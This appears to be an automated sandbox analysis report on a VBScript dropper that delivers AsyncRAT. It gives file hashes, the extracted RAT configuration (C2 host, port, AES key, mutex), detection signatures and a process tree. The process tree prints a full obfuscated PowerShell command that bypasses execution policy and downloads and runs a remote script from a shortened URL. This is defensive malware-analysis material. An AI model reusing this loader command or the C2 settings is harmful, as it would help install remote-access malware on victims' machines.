Overview

overview

10

Static

static

KHTC288.vbs

windows7_x64

8

KHTC288.vbs

windows10_x64

10

Analysis

  • max time kernel
    87s
  • max time network
    146s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    24-07-2021 07:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    KHTC288.vbs

  • Size

    662B

  • MD5

    896c2bbb0dda248ac02ed60683858fa5

  • SHA1

    42e44987ae2d842f4e6d197bde7694d18d1dc57a

  • SHA256

    df8d5648e265825d946b6a3cffe442a39d04570bbe8834cfd54e2aa568fb4520

  • SHA512

    090bf4471502c608a3226a02efca77c4e31b345e505c6bee21d5e12b25043a45ec71daca3a73ac81523429dab2f400d3358f40bae7e2523272d7bfa762b06c81

Score
10/10
asyncratratsuricata

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

C2

fat7eorami.ddns.net:1177

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • aes_key

    G2WOlk5vwHneijb61ynCU3xRR3D20hZw

  • anti_detection

    false

  • autorun

    false

  • bdos

    false

  • delay

    omarf2r

  • host

    fat7eorami.ddns.net

  • hwid

    3

  • install_file

  • install_folder

    %AppData%

  • mutex

    AsyncMutex_6SI8OkPnk

  • pastebin_config

    null

  • port

    1177

  • version

    0.5.7B

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

    ratasyncrat
  • suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
    suricata
  • Async RAT payload 2 IoCs
    rat
  • Blocklisted process makes network request 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\KHTC288.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:632
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec Bypass gdr -*;Set-Variable 5 (&(Get-Item Variable:/E*t).Value.InvokeCommand.(((Get-Item Variable:/E*t).Value.InvokeCommand|Get-Member|?{(DIR Variable:/_).Value.Name-ilike'*ts'}).Name).Invoke('*w-*ct')Net.WebClient);Set-Variable S 'https://bit.ly/3wZ38ji'; (Get-Item Variable:/E*t).Value.InvokeCommand.InvokeScript((GCI Variable:5).Value.((((GCI Variable:5).Value|Get-Member)|?{(DIR Variable:/_).Value.Name-ilike'*wn*g'}).Name).Invoke((GV S -ValueO)))
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2528
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file C:\Users\Public\ToT.ps1
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1380
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
          4⤵
            PID:3492
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:192

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Credential Access

    Discovery

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Public\ToT.ps1
      MD5

      ae87ac57338d18d8d6a1e91bb24b9834

      SHA1

      feeb1bdad90399c41e97d329a3d007f7fec6ab58

      SHA256

      c098aae184b0d20e79b0e7e92bf5722d0febf1949972af6426c8f915dd1d73c1

      SHA512

      095577ca3789215f73c3817e21bdc00b9484111f613c6d97582b365d09faf228156f7d1703496984aee44d55fe5513ab18860002f4e537495b34ea7f4635baa2

      Download Submit
    • memory/192-375-0x0000000006040000-0x0000000006041000-memory.dmp
      Filesize

      4KB

      Download
    • memory/192-379-0x0000000007080000-0x0000000007081000-memory.dmp
      Filesize

      4KB

      Download
    • memory/192-356-0x0000000000400000-0x0000000000412000-memory.dmp
      Filesize

      72KB

      Download
    • memory/192-372-0x0000000005670000-0x0000000005671000-memory.dmp
      Filesize

      4KB

      Download
    • memory/192-382-0x00000000075D0000-0x0000000007629000-memory.dmp
      Filesize

      356KB

      Download
    • memory/192-381-0x0000000007440000-0x00000000074CD000-memory.dmp
      Filesize

      564KB

      Download
    • memory/192-380-0x0000000006FF0000-0x0000000006FF4000-memory.dmp
      Filesize

      16KB

      Download
    • memory/192-373-0x0000000005FA0000-0x0000000005FA1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/192-378-0x0000000006F80000-0x0000000006F81000-memory.dmp
      Filesize

      4KB

      Download
    • memory/192-377-0x0000000006E00000-0x0000000006E79000-memory.dmp
      Filesize

      484KB

      Download
    • memory/192-376-0x0000000006E80000-0x0000000006E81000-memory.dmp
      Filesize

      4KB

      Download
    • memory/192-357-0x000000000040C73E-mapping.dmp
      Download
    • memory/192-383-0x0000000007630000-0x0000000007631000-memory.dmp
      Filesize

      4KB

      Download
    • memory/192-374-0x0000000006540000-0x0000000006541000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1380-336-0x0000020DCFF03000-0x0000020DCFF05000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1380-353-0x0000020DD0040000-0x0000020DD004E000-memory.dmp
      Filesize

      56KB

      Download
    • memory/1380-335-0x0000020DCFF00000-0x0000020DCFF02000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1380-334-0x0000020DD0050000-0x0000020DD0051000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1380-311-0x0000000000000000-mapping.dmp
      Download
    • memory/1380-361-0x0000020DCFF06000-0x0000020DCFF08000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2528-125-0x0000026FD3950000-0x0000026FD3951000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2528-124-0x0000026FD3713000-0x0000026FD3715000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2528-114-0x0000000000000000-mapping.dmp
      Download
    • memory/2528-119-0x0000026FD3660000-0x0000026FD3661000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2528-123-0x0000026FD3710000-0x0000026FD3712000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2528-310-0x0000026FD3716000-0x0000026FD3718000-memory.dmp
      Filesize

      8KB

      Download